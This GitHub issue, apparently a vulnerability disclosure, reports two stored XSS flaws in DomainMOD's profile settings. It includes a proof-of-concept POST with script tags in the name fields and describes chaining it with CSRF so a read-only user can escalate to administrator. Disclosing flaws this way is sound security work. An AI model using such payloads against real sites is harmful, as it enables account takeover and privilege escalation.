Skip to content

There are two Stored XSS vulnerability #66

Closed
@anquanquantao

Description

@anquanquantao

There are two Stored XSS vulnerability.
read-only user use the add the Stored XSS and CSRF can add administrator account or change the read-only user to admin or change admin password……

poc:
after read-only user login
post url https://demo.domainmod.org/settings/profile/
post data:new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F2222%2F%29%3C%2Fscript%3E&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0

then the admin login ,open the url https://demo.domainmod.org/admin/users/. the javascript will execution. with CSRF vulnerability(#65) , a read-only user can add administrator account or change the read-only user to admin or change admin password……

Metadata

Metadata

Assignees

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions